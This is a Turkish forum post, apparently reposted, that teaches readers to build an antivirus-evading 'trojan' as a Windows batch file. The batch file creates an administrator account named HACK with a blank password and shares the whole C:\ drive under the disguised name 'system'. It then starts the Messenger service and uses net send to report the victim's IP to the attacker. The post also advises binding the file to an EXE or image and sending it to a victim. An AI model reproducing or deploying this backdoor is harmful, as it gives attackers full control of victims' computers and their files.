»»»»AV lere YAKALANMAYAN trojen yapımı ««««

    Paylaş
    avatar
    Dabbe
    General
    General

    Erkek
    Mesaj Sayısı : 234
    Yaş : 25
    Nerden : konya
    Kayıt tarihi : 05/05/08

    default »»»»AV lere YAKALANMAYAN trojen yapımı ««««

    Mesaj  Dabbe Bir Çarş. Mayıs 21, 2008 11:09 pm


    Ewet arkadaslar, konunun basligindan da anlayabileceginiz
    gibi Anti Virus programlari tarafindan taninmayan tamamen size ait bir trojan
    yapmayi size kisaca anlatacagim;

    Trojanin ana amaci, adindan da
    anlasilacagi gibi hedef sisteme sizarak ya ele gecirmek ya da bilgi toplamaktir.
    Dikkat edin zarar vermek demiyorum cünkü bu etik olarak yanlis bir
    harekettir

    Piyasada bu konuda son derece fonksiyonel bircok Trojan var
    fakat bu trojanlari kodlayanlarin hepsi Ticari amac güttükleri icin ki bu konuda
    da sonuna kadar haklidirlar, Trojanlarin Special Edition olan versiyonlarinin
    disindaki tüm Public versiyonlari maalesef AV lerce taninmakta ve hepsinden
    önemlisi Firewallar tarafindan bloke edilmektedirler ve bu da kullanicilarin
    isini oldukca zorlastirmaktadir.

    Size simdi anlatacagim yöntem, biraz
    mantik biraz da teknik bilgi gerektirmektedir. Bu ikisinin disinda baska hicbir
    toola ihtiyaciniz yoktur.

    Simdi Trojanimizi hazirlamaya
    baslayalim;

    1-) Öncelikle bir TXT dosyasi acin ve icine su komutu
    girin;

    net user HACK /add

    Bu komut sayesinde kurbanin makinasinda
    "HACK" isminde bir user yarattik. Fakat bu user hesabi normal olarak acildigi
    icin haklari da sınırlı olacaktir. Bu nedenle ikinci asamaya
    geciyoruz;

    2-) Simdi yukaridaki komutun hemen bir alt satirina gecin ve
    su komutu ekleyin;

    net localgroup administrators HACK /add

    Böylece
    "HACK" isimli kullanici hesabini, direk Administrator grubuna kattik. Artik
    "HACK" hesabimiz tüm yetkilere sahip.

    3-) Simdi de kurbanimizin
    makinasindaki C:\ sürücüsünü sınırsız paylasima acacagiz. Kurbani da
    huylandirmamak icin paylasim adini SYSTEM olarak set edecegiz. Bunun icin
    asagidaki komutu kullanacagiz;

    net share system=C:\
    /unlimited

    Ewet artik Kurbanimizin makinasini sonuna kadar actik. Peki
    kurbanin IP sini nereden bilecegiz de kurbanin makinasina bu yarattigimiz "HACK"
    hesabindan baglanacagiz?

    Bunun icin de kodumuza bir satirlik bir komut
    daha ekleyecegiz;

    4-) NET SEND komutunu kullanarak kurbanin bize
    Windowsun Messaging Servisi vasitasi ile mesaj atmasini ve IP sini bize
    söylemesini saglayacagiz. Bunun icin asagidaki komutu da kodunuzun icerisine
    ekleyin;

    net send 82.35.23.46(buraya kendi IP nizi girin) Ben senin
    kurbaninim Gel bana baglan

    Unutmayin 82. li baslayan IP adresi yerine
    kendi IP nizi yazin.

    4-) Son olarak ufak bir önlem alacagiz. Peki nedir
    bu önlem? Bildiginiz gibi Windows Messenger Servisini kullanan internette
    ortalikta gezinen bircok ufak tefek Spylar oldugu icin Messenger servisi genelde
    Disabled 'dir. Disabled olursa NET SEND komutu bir ise yaramaz. DOS komut
    satirinda yardimci ekler olmadikca da herhangi bir Disabled servisi Enable
    bildigim kadari ile edemeyiz. Fakat eger Disabled degil de Manuel ise o zaman
    Messenger servisini calistirabiliriz. Bu son önlemimizde de Manuel olan ve
    calismayan Messenger servisini calistiracagiz.

    Öncelikle Administrative
    Tools dan Services sekmesine giriyoruz ve oradan Messenger servisinin kod
    icerisinde kullanacagimiz adini ögreniyoruz. Adi Messenger 'mis. simdi bu adi
    kullanarak bu servisi calistiriyoruz.

    net start Messenger

    Size
    tavsiyem, bu son komutu kodunuzun en basina koymaniz. Böylelikle ardisik sirada
    önce Messenger servisi calistirilacak daha sonra diger islemler yapilacaktir.
    Kodun saglikli calismasi acisindan bu 4. şıkkı ilk siraya koymaniz daha iyi
    olur.

    Son olarak TXT de yazdiginiz kodunuzu .bat olarak istediginiz bir
    isimde kaydedin ve ister bir EXE ile join ettirin ister bir resim ile
    birlestirin isterseniz kurbaniniza direk gönderin.

    Kurbaniniz bu dosyayi
    calistirdigi an makinasinda Admin haklarina sahip HACK adinda bir user acilacak
    ve sifresi de blank yani bos olacaktir. C:\ sürücüsü de full olarak paylasima
    acilmis olacak ve son olarak da IP si size gelecektir.

    Artik IP sini de
    bildiginize göre, ister DOS komut satirina düserek direk HACK kullanicisina
    baglanabilir istediginizi yapabilirsiniz ister Essential Net Tools türünden bir
    program ile paylasima actirdiginiz C:\ sürücüsüne sizar istediginizi
    yaparsiniz.

    Isin en güzel tarafi, yukaridaki BAT dosyasinin tamamen
    Microsoftun bize sundugu DOS komutlari kullanilarak hazirlanmis olmasi nedeni
    ile hicbir Anti Viruse yakalanmamasi ve "HACK" kullanicisina direk Admin olarak
    baglandiginiz icin hicbir personal firewall tarafindan
    engellenmemesidir.


    alıntıdır

    hadi ama birileri cevap yazsın
    artık


    _________________
    нєякєѕιη нανα αттığı уєя∂є вєηιм яüzgαяιм єѕєя Benim KOnaklayamadigim Yerde Kimse İstirat EDEMEZ...

      Forum Saati Perş. Ara. 13, 2018 8:51 am